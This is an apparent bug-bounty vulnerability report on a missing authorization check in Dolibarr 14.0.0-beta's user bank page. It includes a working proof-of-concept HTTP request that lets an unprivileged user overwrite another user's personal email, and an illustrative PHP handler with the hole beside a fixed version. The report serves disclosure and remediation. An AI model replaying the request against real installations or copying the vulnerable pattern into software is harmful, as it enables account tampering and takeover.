Improper Privilege Management in dolibarr/dolibarr

Valid

Reported on

May 24th 2021


💥 BUG

An unprivileged user can set the personal email address of another user.

💥 IMPACT

A user who has no access at all to the "Users & Groups" module can update other users' personal email addresses.

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEPS TO REPRODUCE

1. First, log in as the admin account and add user B as a normal (non-admin) user.
Now give user B only the permission below in the Banks and cash module:

--->Read financial accounts

Do not give user B any permission in the Users & Groups module.

So user B cannot see or update any other user's details through the UI.

2. Finally, log in as user B and send the request below to set the personal email of another user (id=1 is the target user's id; the token is the anti-CSRF token from user B's own session).

POST /dolibarr-develop/htdocs/user/bank.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?action=editpersonal_email&id=1
Cookie: 
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

action=setpersonal_email&token=$2y$10$TUDmdyquHaipBbj6WfoH1.r/v6qeQdG2OO7oFPqjY1pNkINXfa4gm&id=1&personal_email=admin%40yfg.cosm&modify=Modify

So user B has no "Users & Groups" permission but can still update another user's personal email. The `token` parameter only proves the request was issued from a page user B loaded (CSRF protection); it does not check that user B is allowed to edit the record identified by `id`, and that authorization check is what is missing here.
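To make the missing check concrete, here is an added illustration of the vulnerable handler shape next to a hardened one. This is example code written for this report, not Dolibarr's own code: `$user->rights->user->user->creer`, `GETPOST()`, `accessforbidden()` and the `User` class with `fetch()`/`update()` are assumed names modelled on Dolibarr conventions, and the handler functions themselves are hypothetical. The point is that the anti-CSRF token and the per-module rights are separate questions: a request can carry a valid token and still come from a caller who may not touch the target record.

```php
<?php
// Illustration only (not Dolibarr's code). Assumes a Dolibarr-style $user with
// ->id and ->rights->user->user->creer, a GETPOST() helper, an accessforbidden()
// helper that renders a 403 page and exits, and a User class with fetch()/update().
// All of these names are assumptions modelled on Dolibarr conventions.

// --- Vulnerable shape: the action trusts the (CSRF) token and the posted id, but
// never asks whether the *caller* may edit the user record identified by id.
function handle_setpersonal_email_vulnerable($db, $user)
{
    $id     = GETPOST('id', 'int');
    $action = GETPOST('action', 'aZ09');

    if ($action == 'setpersonal_email') {
        $object = new User($db);
        $object->fetch($id);                                   // any id the caller chooses
        $object->personal_email = GETPOST('personal_email', 'alpha');
        $object->update($user);                                // written with no rights check
    }
}

// --- Authorization decision, kept in one place so every user-editing action can reuse it.
// A user may always edit their own record; editing anyone else's record requires the
// "create/modify users" right of the Users & Groups module (assumed name: user->user->creer).
function can_edit_user_record($user, $targetId)
{
    if ((int) $targetId === (int) $user->id) {
        return true;                                           // self-service is fine
    }
    return !empty($user->rights->user->user->creer);          // otherwise need the module right
}

// --- Hardened shape: decide authorization before any state changes, and fail closed.
function handle_setpersonal_email_fixed($db, $user)
{
    $id     = GETPOST('id', 'int');
    $action = GETPOST('action', 'aZ09');

    if ($action == 'setpersonal_email') {
        if ($id <= 0 || !can_edit_user_record($user, $id)) {
            accessforbidden();                                 // 403 and stop; nothing written yet
        }

        $object = new User($db);
        if ($object->fetch($id) <= 0) {
            accessforbidden();                                 // unknown target: same failure path
        }
        $object->personal_email = GETPOST('personal_email', 'alpha');
        $object->update($user);
    }
}
```

To verify a fix of this shape, replay the exact request above as user B (their own valid `token`, `id=1`) and expect the forbidden page with no change to user 1's personal email, then repeat with `id` set to user B's own id and confirm that self-edit still works. Checking both directions matters: a fix that simply denies every `setpersonal_email` request would break the legitimate case.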